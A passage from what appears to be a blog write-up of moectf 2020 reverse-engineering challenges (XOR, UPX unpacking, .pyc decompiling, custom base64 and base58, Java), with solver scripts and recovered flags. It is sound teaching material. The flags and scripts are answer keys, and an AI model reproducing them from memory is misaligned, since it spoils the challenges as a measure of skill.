class="number">0</span>; i4 <= <span class="number">30</span>; ++i4 )</span><br><span class="line"> aim[i4] ^= <span class="number">0x37</span>u;</span><br><span class="line"> <span class="built_in">cout</span><<aim;</span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">} </span><br></pre></td></tr></table></figure><p>Basically taken straight from my girlfriend <code>IDA</code>, with just a little bit added...</p><h3 id="Protection"><a href="#Protection" class="headerlink" title="Protection"></a>Protection</h3><p><img src="/images/2020moectf-Reverse/image-20201015204311672.png" class="lazyload" data-srcset="/images/2020moectf-Reverse/image-20201015204311672.png" srcset="" alt="image-20201015204311672"></p><p>The hint is already obvious: "put a layer of clothing on the program" => "packer":</p><p><img src="/images/2020moectf-Reverse/image-20201015204634519.png" class="lazyload" data-srcset="/images/2020moectf-Reverse/image-20201015204634519.png" srcset="" alt="image-20201015204634519"></p><p>Check the packer with <code>DIE</code>: <code>UPX3.96</code>. We grab the <a href="https://github.com/upx/upx/releases/tag/v3.96">UPX3.96</a> unpacker straight from github and "strip it bare":</p><p><img src="/images/2020moectf-Reverse/image-20201015205045144.png" class="lazyload" data-srcset="/images/2020moectf-Reverse/image-20201015205045144.png" srcset="" alt="image-20201015205045144"></p><p>At this point I try running it:<img src="/images/2020moectf-Reverse/image-20201015205433735.png" class="lazyload" data-srcset="/images/2020moectf-Reverse/image-20201015205433735.png" srcset="" alt="image-20201015205433735"></p><p>Hmph~ die! It won't just give me the <code>flag</code>, so go and meet my girlfriend:<img src="/images/2020moectf-Reverse/image-20201015205601697.png" class="lazyload" data-srcset="/images/2020moectf-Reverse/image-20201015205601697.png" srcset="" alt="image-20201015205601697"></p><p>Yoshi~ girlfriend to the rescue again!!! The program logic is simple, XOR again; straight to the decryption program:</p><figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span 
class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string"><bits/stdc++.h></span></span></span><br><span class="line"><span class="keyword">using</span> <span class="keyword">namespace</span> <span class="built_in">std</span>;</span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"><span class="built_in">string</span> x=<span class="string">"aouv#@!V08asdozpnma&*#%!$^&*"</span>;</span><br><span class="line"><span class="keyword">char</span> v5[<span class="number">30</span>]={<span class="number">0</span>}; <span class="comment">// zero-filled so the output is NUL-terminated</span></span><br><span class="line"><span class="keyword">int</span> y[<span class="number">30</span>]={<span class="number">12</span>,<span class="number">0</span>,<span class="number">16</span>,<span class="number">21</span>,<span class="number">87</span>,<span class="number">38</span>,<span class="number">90</span>,<span class="number">35</span>,<span class="number">64</span>,<span class="number">64</span>,<span class="number">62</span>,<span class="number">66</span>,<span class="number">55</span>,<span class="number">48</span>,<span class="number">9</span>,<span class="number">25</span>,<span class="number">3</span>,<span class="number">29</span>,<span class="number">80</span>,<span class="number">67</span>,<span class="number">7</span>,<span class="number">87</span>,<span class="number">21</span>,<span class="number">126</span>,<span class="number">81</span>,<span class="number">109</span>,<span class="number">67</span>,<span class="number">87</span>};</span><br><span class="line"><span 
class="keyword">for</span> (<span class="keyword">int</span> i = <span class="number">0</span>; i <= <span class="number">27</span>; ++i )</span><br><span class="line">v5[i]= y[i] ^ x[i];</span><br><span class="line"><span class="built_in">cout</span><<v5;</span><br><span class="line"><span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure><blockquote><p>moectf{upx_1S_simp1e-t0_u3e}</p></blockquote><h3 id="Real-EasyPython"><a href="#Real-EasyPython" class="headerlink" title="Real EasyPython"></a>Real EasyPython</h3><p>The download is a <code>.pyc</code> file, which you can think of as compiled <code>py</code> bytecode, so the usual approach applies: decompile it. Searching for "<code>Python</code> decompile":</p><p><img src="/images/2020moectf-Reverse/image-20201015212125827.png" class="lazyload" data-srcset="/images/2020moectf-Reverse/image-20201015212125827.png" srcset="" alt="image-20201015212125827"></p><p>The first site decompiles online; the second points to the tool <code>uncompyle6</code>. Here is how the <code>python</code> decompiler is used (the installed <code>uncompyle6</code> has to support the interpreter version recorded in the <code>.pyc</code> header, otherwise it refuses the file):</p><blockquote><p>pip install uncompyle6</p><p>uncompyle6 puzzle.pyc > puzzle_dec.py</p></blockquote><p><img src="/images/2020moectf-Reverse/image-20201015212449547.png" class="lazyload" data-srcset="/images/2020moectf-Reverse/image-20201015212449547.png" srcset="" alt="image-20201015212449547">Now let's look at the decompiled <code>python</code> script:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span 
class="line">key = [</span><br><span class="line"> <span class="number">115</span>, <span class="number">76</span>, <span class="number">50</span>, <span class="number">116</span>, <span class="number">90</span>, <span class="number">50</span>, <span class="number">116</span>, <span class="number">90</span>, <span class="number">115</span>, <span class="number">110</span>, <span class="number">48</span>, <span class="number">47</span>, <span class="number">87</span>, <span class="number">48</span>, <span class="number">103</span>, <span class="number">50</span>, <span class="number">106</span>, <span class="number">126</span>, <span class="number">90</span>, <span class="number">48</span>, <span class="number">103</span>, <span class="number">116</span>, <span class="number">126</span>, <span class="number">90</span>, <span class="number">85</span>, <span class="number">126</span>, <span class="number">115</span>, <span class="number">110</span>, <span class="number">105</span>, <span class="number">104</span>, <span class="number">35</span>]</span><br><span class="line">print(<span class="string">'Input your flag: '</span>, end=<span class="string">''</span>)</span><br><span class="line">flag = <span class="built_in">input</span>()</span><br><span class="line">out = []</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> flag:</span><br><span class="line"> out.append(<span class="built_in">ord</span>(i) >> <span class="number">4</span> ^ <span class="built_in">ord</span>(i))</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> <span class="built_in">len</span>(out) != <span class="built_in">len</span>(key):</span><br><span class="line"> print(<span class="string">'TRY AGAIN!'</span>)</span><br><span class="line"> exit()</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span 
class="built_in">len</span>(out)):</span><br><span class="line"> <span class="keyword">if</span> out[i] != key[i]:</span><br><span class="line">  print(<span class="string">'TRY AGAIN!'</span>)</span><br><span class="line">  exit()</span><br><span class="line"></span><br><span class="line">print(<span class="string">'you are right! the flag is : moectf{%s}'</span> % flag)</span><br></pre></td></tr></table></figure><p>The logic is clear, but there is one small point: how do we undo the <code>>></code> in the script? Just use <code><<</code> and be done? Wrong! <code>>></code> drops the low four bits of the value, while <code><<</code> appends four zero bits; the bits shifted out are gone, so shifting back cannot recover them. So we handle the <code>>></code> by brute force instead: for each position, try every printable byte until <code>(j >> 4) ^ j</code> matches the stored value. Script:</p><figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string"><bits/stdc++.h></span></span></span><br><span class="line"><span class="keyword">using</span> <span class="keyword">namespace</span> <span class="built_in">std</span>;</span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"><span class="keyword">int</span> ori[<span class="number">50</span>]={<span class="number">115</span>, <span class="number">76</span>, <span class="number">50</span>, <span class="number">116</span>, <span class="number">90</span>, <span class="number">50</span>, <span 
class="number">116</span>, <span class="number">90</span>, <span class="number">115</span>, <span class="number">110</span>, <span class="number">48</span>, <span class="number">47</span>, <span class="number">87</span>, <span class="number">48</span>, <span class="number">103</span>, <span class="number">50</span>, <span class="number">106</span>, <span class="number">126</span>, <span class="number">90</span>, <span class="number">48</span>, <span class="number">103</span>, <span class="number">116</span>, <span class="number">126</span>, <span class="number">90</span>, <span class="number">85</span>, <span class="number">126</span>, <span class="number">115</span>, <span class="number">110</span>, <span class="number">105</span>, <span class="number">104</span>, <span class="number">35</span>};</span><br><span class="line"><span class="keyword">char</span> rel[<span class="number">50</span>]={<span class="number">0</span>}; <span class="comment">// zero-filled so the result is NUL-terminated</span></span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">int</span> i=<span class="number">0</span>;i<<span class="number">31</span>;i++) <span class="comment">// key has 31 entries</span></span><br><span class="line">{</span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">int</span> j=<span class="number">33</span>;j<<span class="number">127</span>;j++)</span><br><span class="line"><span class="keyword">if</span>((j>><span class="number">4</span>^j)==ori[i])</span><br><span class="line">rel[i]=j;</span><br><span class="line">}</span><br><span class="line"><span class="built_in">cout</span><<rel;</span><br><span class="line"><span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">}</span><br><span class="line"><span class="comment">// moectf{tH1s_1s_th3-R3a1ly_3asy_Python!}</span></span><br></pre></td></tr></table></figure><h3 id="RxEncode"><a href="#RxEncode" class="headerlink" title="RxEncode"></a>RxEncode</h3><p>This one... straight to my girlfriend; I'm sure I can't manage it alone, so she has to help. First check the strings in <code>IDA</code>:</p><p><img 
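alt=""></p><p>(Added example, not code from the original writeup; the walkthrough continues below it.) The two points the walkthrough establishes, that the constants <code>IDA</code> shows are little-endian 32-bit words and that the comparison is base64 over a modified alphabet, in one script. The 24 bytes are the ones dumped in this section; the alphabet is the standard one with <code>5</code> and <code>6</code> replaced by <code>{</code> and <code>}</code>, which is what the <code>replace</code> calls in the decoding script below imply; that this is exactly the binary's table is an assumption here, as are the function names.</p>

```python
"""RxEncode: little-endian dump of decompiler constants, and base64 with a substituted
alphabet in both directions. Added example, not the writeup's own code."""
import base64
import struct

# The 24 bytes the writeup dumps from the binary's hex view.
STORED = bytes.fromhex("9A879CB5FE58D14AFE0BED6CFAFDEBCBE834A3438EA3477A")

STD_ALPHABET = b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
# Assumed custom table: the writeup maps '5'->'{' and '6'->'}' after standard base64,
# so the binary's table is taken to be the standard one with those two symbols swapped in.
CUSTOM_ALPHABET = STD_ALPHABET.replace(b"5", b"{").replace(b"6", b"}")


def as_le_words(data: bytes):
    """Show the bytes the way a decompiler prints them: little-endian u32 constants."""
    return list(struct.unpack("<%dI" % (len(data) // 4), data))


def from_le_words(words) -> bytes:
    """Pack decompiler constants back into the byte order they have in memory."""
    return struct.pack("<%dI" % len(words), *words)


def b64encode_custom(data: bytes, alphabet: bytes = CUSTOM_ALPHABET) -> str:
    """Standard base64, then translate standard symbols to the custom table."""
    table = bytes.maketrans(STD_ALPHABET, alphabet)
    return base64.b64encode(data).translate(table).decode()


def b64decode_custom(text: str, alphabet: bytes = CUSTOM_ALPHABET) -> bytes:
    """Inverse: translate custom symbols back to the standard table, then decode."""
    table = bytes.maketrans(alphabet, STD_ALPHABET)
    return base64.b64decode(text.encode().translate(table))


def recover_flag() -> str:
    """32 flag characters <-> 24 stored bytes: the binary decodes, so we encode."""
    return b64encode_custom(STORED)


if __name__ == "__main__":
    print([f"{w:#010x}" for w in as_le_words(STORED)])  # what the decompiler displays
    print(recover_flag())
```

<p>The length ratio settles the direction: 24 bytes correspond to 32 base64 characters, so the binary must be decoding the typed flag with its table and comparing bytes, and recovery is an encode. The same <code>maketrans</code> trick works for any base64 variant whose table is a permutation of the standard one.</p><p><img 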
src="/images/2020moectf-Reverse/image-20201015235929048.png" class="lazyload" data-srcset="/images/2020moectf-Reverse/image-20201015235929048.png" srcset="" alt="image-20201015235929048"></p><p>Seeing a string like that, the blind guess is <code>base64</code> with a substituted table. Then look at how the main function works:</p><p><img src="/images/2020moectf-Reverse/image-20201016001109276.png" class="lazyload" data-srcset="/images/2020moectf-Reverse/image-20201016001109276.png" srcset="" alt="image-20201016001109276"></p><p>Program flow:</p><blockquote><p>input <code>flag</code> => "custom-table <code>base64</code>" transform => compare with the data inside the program => <code>yes/no</code></p></blockquote><p>So our approach is:</p><blockquote><p>extract the internal data => apply the inverse "custom-table <code>base64</code>" transform => <code>flag</code></p></blockquote><p>But there is a catch: the internal data is not a string, it shows up as hexadecimal integers:</p><p><img src="/images/2020moectf-Reverse/image-20201016002018346.png" class="lazyload" data-srcset="/images/2020moectf-Reverse/image-20201016002018346.png" srcset="" alt="image-20201016002018346"></p><p>What now? This brings in another concept, byte order (endianness). <code>v2, v15, v16, v17</code> are shown as little-endian integers, so the bytes in memory are in the reverse order of the displayed hex. Go to the <code>hex</code> view, or <code>dump</code> the bytes yourself, to get the real contents (24 bytes in total):</p><blockquote><p><code>\x9A\x87\x9C\xB5\xFE\x58\xD1\x4A\xFE\x0B\xED\x6C\xFA\xFD\xEB\xCB\xE8\x34\xA3\x43\x8E\xA3\x47\x7A</code></p></blockquote><p>What remains is a custom-table <code>base64</code> problem. Since 24 bytes correspond to 32 base64 characters, the program must be decoding the typed flag, so recovering the flag means encoding the stored bytes and mapping the two substituted symbols back:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> base64</span><br><span class="line"></span><br><span class="line">flag_en = <span class="string">b'\x9A\x87\x9C\xB5\xFE\x58\xD1\x4A\xFE\x0B\xED\x6C\xFA\xFD\xEB\xCB\xE8\x34\xA3\x43\x8E\xA3\x47\x7A'</span></span><br><span class="line">flag = base64.b64encode(flag_en).decode().replace(<span class="string">'5'</span>, <span class="string">'{'</span>).replace(<span class="string">'6'</span>, <span 
class="string">'}'</span>)</span><br><span class="line">print(flag)</span><br><span class="line"><span class="comment"># moectf{Y0Ur+C+1s+v3ry+g0o0OOo0d}</span></span><br></pre></td></tr></table></figure><h3 id="EasyCommonLisp"><a href="#EasyCommonLisp" class="headerlink" title="EasyCommonLisp"></a>EasyCommonLisp</h3><p>This one is a real headache!!! To solve it you have to go and learn the <code>clisp</code> language first.</p><blockquote><p>"A real <code>CTF</code> player should be able to learn any language within <code>15mins</code>!!! (smug face)" -- <code>XDSEC_Reverier(RX</code></p></blockquote><p>The challenge:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">(defparameter +alphabet+"AB#DEd@f&hi!klmnLMw3^5678N}PF|HIxyz012JKYZab%Q{S(UVWX-pqrs")(defparameter +len+(length +alphabet+))(defun divmod(number divisor)(values(floor(/ number divisor))(mod number divisor)))(defun encode(str)(let((value 0)(rstr(reverse str))(output(make-string-output-stream))(npad 0))(loop for i from 0 to(1- (length str))do(setf value(+ value(*(char-code(elt rstr i))(expt 256 i)))))(loop while(>= value +len+)do(multiple-value-bind(new-value mod)(divmod value +len+)(setf value new-value)(write-char(elt +alphabet+ mod) output)))(write-char(elt +alphabet+ value)output)(loop for char across str do(if(char-equal char #\Nul)(incf npad)(return)))(concatenate 'string(coerce(loop for i from 1 to npad collecting #\1)'string)(reverse(get-output-stream-string output)))))(print(encode "moectf{xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx}"))</span><br><span class="line"></span><br><span class="line">;;;; eof</span><br><span class="line">;;;; flag is "&Dx16Y!x3((xYDlShWbQ5hmzWf3EZly6h8UwD#d-1-&#WlDHJaxM5qAzlPP"</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>Formatted by hand:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span 
class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span 
class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br></pre></td><td class="code"><pre><span class="line">(defparameter +alphabet+"AB#DEd@f&hi!klmnLMw3^5678N}PF|HIxyz012JKYZab%Q{S(UVWX-pqrs");</span><br><span class="line">(defparameter +len+(length +alphabet+))</span><br><span class="line">(</span><br><span class="line">defun divmod(number divisor)</span><br><span class="line">(</span><br><span class="line">values(floor(/ number divisor))(mod number divisor)</span><br><span class="line">)</span><br><span class="line">)</span><br><span class="line"></span><br><span class="line">(</span><br><span class="line">defun encode(str)</span><br><span class="line">(</span><br><span class="line">let</span><br><span class="line">(</span><br><span class="line">(value 0)</span><br><span class="line">(rstr(reverse str))</span><br><span class="line">(output(make-string-output-stream))</span><br><span class="line">(npad 0)</span><br><span class="line">)</span><br><span class="line">(</span><br><span class="line">loop for i from 0 to(1- (length str))</span><br><span class="line">do</span><br><span class="line">(</span><br><span class="line">setf value</span><br><span class="line">(</span><br><span class="line">+ value(*(char-code(elt rstr i))(expt 256 i))</span><br><span class="line">)</span><br><span class="line">)</span><br><span class="line">)</span><br><span class="line">(</span><br><span class="line">loop while(>= value +len+)</span><br><span class="line">do</span><br><span class="line">(</span><br><span class="line">multiple-value-bind</span><br><span class="line">(new-value mod)</span><br><span class="line">(divmod value +len+)</span><br><span class="line">(setf value new-value)</span><br><span class="line">(write-char(elt +alphabet+ mod) output)</span><br><span class="line">)</span><br><span class="line">)</span><br><span class="line">(</span><br><span class="line">write-char(elt +alphabet+ 
value)output</span><br><span class="line">)</span><br><span class="line">(</span><br><span class="line">loop for char across str </span><br><span class="line">do</span><br><span class="line">(</span><br><span class="line">if(char-equal char #\Nul)</span><br><span class="line">(incf npad);npad++;</span><br><span class="line">(return)</span><br><span class="line">)</span><br><span class="line">)</span><br><span class="line">(print npad)</span><br><span class="line">(</span><br><span class="line">concatenate 'string(coerce(loop for i from 1 to npad collecting #\1)'string)</span><br><span class="line">(</span><br><span class="line">reverse(get-output-stream-string output)</span><br><span class="line">)</span><br><span class="line">)</span><br><span class="line">)</span><br><span class="line">)</span><br><span class="line">(print(encode "moectf{xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx}"))</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">;;;; eof</span><br><span class="line">;;;; flag is "&Dx16Y!x3((xYDlShWbQ5hmzWf3EZly6h8UwD#d-1-&#WlDHJaxM5qAzlPP"</span><br></pre></td></tr></table></figure><p>Slightly prettier than the original, but still ugly...</p><p>What <code>encode</code> does: it reverses the string and sums <code>char-code * 256^i</code>, which is simply the string read as one big-endian integer; it then repeatedly divides that integer by the alphabet length (58), writes each remainder out as an alphabet character, emits the final quotient, and reverses the digits so the most significant comes first; finally it prepends one <code>1</code> per leading NUL byte. In other words, base58 with a custom alphabet.</p><p>The solving process for this one: learn clisp => understand the challenge => rewrite it in <code>python</code> => write the inverse.</p><p>Converted to <code>python</code>:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span 
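class="line"></span></pre></td></tr></table></figure><p>(Added example, not the writeup's code; the line-by-line translation and the decryption script follow below.) The Lisp <code>encode</code> treated as what it is, base58 over a custom alphabet: this Python 3 version reads the bytes as one big-endian integer, emits base-58 digits, and adds the inverse, so the recovered flag can be checked by re-encoding it and comparing with the given ciphertext. The function names are this example's own.</p>

```python
"""EasyCommonLisp: the Lisp encoder as custom-alphabet base58, plus its inverse.
Added example, not the writeup's own code."""

ALPHABET = "AB#DEd@f&hi!klmnLMw3^5678N}PF|HIxyz012JKYZab%Q{S(UVWX-pqrs"
BASE = len(ALPHABET)  # 58 symbols: base58 with a shuffled, non-standard alphabet
CIPHERTEXT = "&Dx16Y!x3((xYDlShWbQ5hmzWf3EZly6h8UwD#d-1-&#WlDHJaxM5qAzlPP"  # from the challenge


def encode(data: bytes) -> str:
    """Mirror of the Lisp encode: the reversed string summed as char*256^i is the
    big-endian integer of the bytes; emit remainders mod 58 least significant first,
    reverse them, and prefix one '1' per leading NUL byte (the Lisp's npad)."""
    value = int.from_bytes(data, "big")
    digits = []
    while value >= BASE:
        value, rem = divmod(value, BASE)
        digits.append(ALPHABET[rem])
    digits.append(ALPHABET[value])
    npad = len(data) - len(data.lstrip(b"\x00"))
    return "1" * npad + "".join(reversed(digits))


def decode(text: str) -> bytes:
    """Inverse: Horner's rule over the digits, then back to big-endian bytes.
    The '1' padding is ambiguous ('1' is also alphabet index 36), so this decoder
    assumes the plaintext has no leading NUL bytes, which holds for a flag."""
    value = 0
    for ch in text:
        idx = ALPHABET.find(ch)
        if idx < 0:
            raise ValueError(f"{ch!r} is not in the alphabet")
        value = value * BASE + idx
    return value.to_bytes((value.bit_length() + 7) // 8, "big")


def recover_flag() -> bytes:
    return decode(CIPHERTEXT)


if __name__ == "__main__":
    flag = recover_flag()
    print(flag.decode())
    assert encode(flag) == CIPHERTEXT  # round trip against the ciphertext given in the challenge
```

<p>Because the whole input is one integer, a single wrong digit changes every byte of the output, which is why the decoder rebuilds the number completely before converting; there is no per-character inverse to brute-force here, unlike the XOR challenges.</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span 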
class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line">alphabet = <span class="string">"AB#DEd@f&hi!klmnLMw3^5678N}PF|HIxyz012JKYZab%Q{S(UVWX-pqrs"</span></span><br><span class="line">length = <span class="built_in">len</span>(alphabet)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">divmod</span>(<span class="params">a,b</span>):</span></span><br><span class="line">    <span class="keyword">return</span> a//b,a%b</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">reverse</span>(<span class="params">s</span>):</span></span><br><span class="line">    <span class="keyword">return</span> <span class="string">''</span>.join(<span class="built_in">reversed</span>(s))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">encode</span>(<span class="params">s</span>):</span></span><br><span class="line">    ans=<span class="string">""</span></span><br><span class="line">    value = <span class="number">0</span></span><br><span class="line">    rstr = reverse(s)</span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0</span>,<span class="built_in">len</span>(s)):</span><br><span class="line">        value = value + <span class="built_in">ord</span>(rstr[i])*(<span class="number">256</span>**i)</span><br><span class="line">    <span class="keyword">while</span> value>=length:</span><br><span class="line">        value, mod = <span class="built_in">divmod</span>(value, length)</span><br><span class="line">        ans=ans+alphabet[mod]</span><br><span class="line">    ans=ans+alphabet[value]</span><br><span class="line">    ans=reverse(ans)</span><br><span class="line">    <span class="keyword">return</span> ans</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">print(encode(<span class="string">"moectf{xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx}"</span>))</span><br><span class="line"></span><br><span class="line"><span class="comment"># target output: "&Dx16Y!x3((xYDlShWbQ5hmzWf3EZly6h8UwD#d-1-&#WlDHJaxM5qAzlPP"</span></span><br><span class="line"></span><br></pre></td></tr></table></figure><p>Then write the decryption script:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">alphabet = <span class="string">"AB#DEd@f&hi!klmnLMw3^5678N}PF|HIxyz012JKYZab%Q{S(UVWX-pqrs"</span></span><br><span class="line">ans = <span class="string">"&Dx16Y!x3((xYDlShWbQ5hmzWf3EZly6h8UwD#d-1-&#WlDHJaxM5qAzlPP"</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">reverse</span>(<span class="params">s</span>):</span></span><br><span class="line">    <span class="keyword">return</span> <span class="string">''</span>.join(<span class="built_in">reversed</span>(s))</span><br><span class="line">ans = reverse(ans)</span><br><span class="line">value = alphabet.find(ans[<span class="built_in">len</span>(ans)-<span class="number">1</span>])</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0</span>,<span class="number">58</span>):</span><br><span class="line">    value = <span class="built_in">len</span>(alphabet)*value + alphabet.find(ans[<span class="built_in">len</span>(ans)-<span class="number">2</span>-i])</span><br><span class="line">flag = <span class="built_in">bytes</span>.fromhex(<span class="built_in">hex</span>(value)[<span class="number">2</span>:])</span><br><span class="line">print(flag.decode())</span><br><span class="line"><span class="comment"># moectf{woO0Oow_Y0u-ar3_th3_g0D_0f_LIIIISP!}</span></span><br></pre></td></tr></table></figure><p>By the way, this decryption script was originally written in <code>python2</code> (slicing the trailing <code>L</code> off <code>hex(value)</code> and calling <code>flag.decode('hex')</code>) because of the strange <code>str</code>/<code>bytes</code> errors under <code>python3</code>; the version above builds the bytes with <code>bytes.fromhex</code> instead and runs on <code>python3</code>.</p><h3 id="EzJava"><a href="#EzJava" class="headerlink" title="EzJava"></a>EzJava</h3><p>Guessing the topic from the name: <code>java</code> reversing.</p><p>First find a <code>java</code> decompiler; here I used <code>jd.gui</code>. Drop the challenge file in and the <code>java</code> source appears:</p><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span 
class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> java.io.BufferedReader;</span><br><span class="line"><span class="keyword">import</span> java.io.InputStreamReader;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">EasyJava</span> </span>{</span><br><span class="line"> <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">main</span><span class="params">(String[] paramArrayOfString)</span> </span>{</span><br><span class="line"> System.out.println(<span class="string">"MoeCTF 2020 EasyJava --by Reverier"</span>);</span><br><span class="line"> System.out.println(<span class="string">"Input your flag and I will check it:"</span>);</span><br><span class="line"> BufferedReader bufferedReader = <span class="keyword">new</span> 